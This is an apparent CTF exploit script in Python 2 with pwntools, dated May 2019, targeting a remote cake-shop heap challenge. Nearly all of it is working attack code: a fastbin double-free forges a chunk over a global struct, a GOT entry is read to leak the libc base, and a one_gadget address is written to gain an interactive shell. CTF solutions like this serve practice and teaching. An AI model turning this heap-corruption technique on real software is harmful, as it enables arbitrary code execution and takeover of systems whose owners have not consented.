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May 24th, 2019
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  1. #!/bin/python2
  2. from pwn import *
  3. import re
  5. context.terminal = ["termite", "-e"]
  6. cidx = 0
  8. def alloc(p, name, price):
  9. p.sendline("M")
  10. p.sendlineafter("Name>", name)
  11. p.sendlineafter("Price>", str(price))
  12. global cidx
  13. cidx = cidx + 1
  14. return cidx - 1
  16. def free(p, i):
  17. p.sendline("S")
  18. p.sendlineafter("This customer looks really hungry. Which cake would you like to give them?", str(i))
  19. p.recvuntil("The customer looks really happy with !")
  21. def leak(p, i):
  22. p.clean()
  23. p.sendline("I")
  24. p.sendlineafter("Which one?", str(i))
  25. leak = p.recvline_contains("is being sold for")
  26. leak = leak.split('$')[-1]
  27. return int(leak)
  29. def break_heap():
  30. global cidx
  31. p = remote('', 42542)
  32. '''
  33. set customers to 0x21 so we can control more of the array,
  34. and so that it is a valid chunk
  35. '''
  36. shop = 0x6030e0 #address of shop struct
  37. p_plt = 0x603048 # &
  38. p_off = 0x55800 # offset from libc base to printf
  39. one_gadget = 0x45216 # magic one gadget
  41. A = alloc(p, "", 16)
  42. B = alloc(p, "", 17)
  43. free(p, A) # A->bk NULL, A = fastbin freelist top
  44. free(p, B) # B->bk = A, B = fastbin freelist top
  45. free(p, A) # A->bk = B, A = fastbin freelist top
  46. # overwrite A->bk with fake chunk before shop. (set shop->price and fchunk size)
  47. C = alloc(p, "", int(shop-0x8))
  49. D = alloc(p, "", 0) # next malloc returns B
  50. E = alloc(p, "", 0) # this alloc returns A
  51. # Next alloc returns shop+0x8. Overwrite customers with shop-0x8 and counter[0] with got addr
  52. F = alloc(p, struct.pack("L", p_plt), int(shop-0x8))
  54. # Libc leak from dereferencing overwritten counter[0]
  55. libc = leak(p, 0) - p_off
  56.'libc base is at: ' + hex(libc))
  57. # Next step is redoing step 1) except now the forged chunk->next will point to shop-0x8
  58. # Then we will NULL out counter[0]
  59. # The following address will be shop-0x8 which means counter[0]->name will overwrite counter[0]
  60. # And we can get an arbitrary write primitive
  62. #you know the drill
  63. free(p, D) # D->bk NULL, D fastbin freelist head
  64. free(p, E) # E->bk NULL, E fastbin freelist head
  65. free(p, D) # D->bk = E, D fastbin freelist head
  66. # overwrite D->bk with fake chunk before shop
  67. G = alloc(p, "", int(shop-0x8))
  69. H = alloc(p, "", 0) # this malloc returns E
  70. I = alloc(p, "", 0) # this malloc returns D
  71. J = alloc(p, struct.pack("L", 0), 0) # this malloc returns shop+0x8
  72. K = alloc(p, struct.pack("L", p_plt), libc + one_gadget)
  74. p.interactive()
  76. break_heap()
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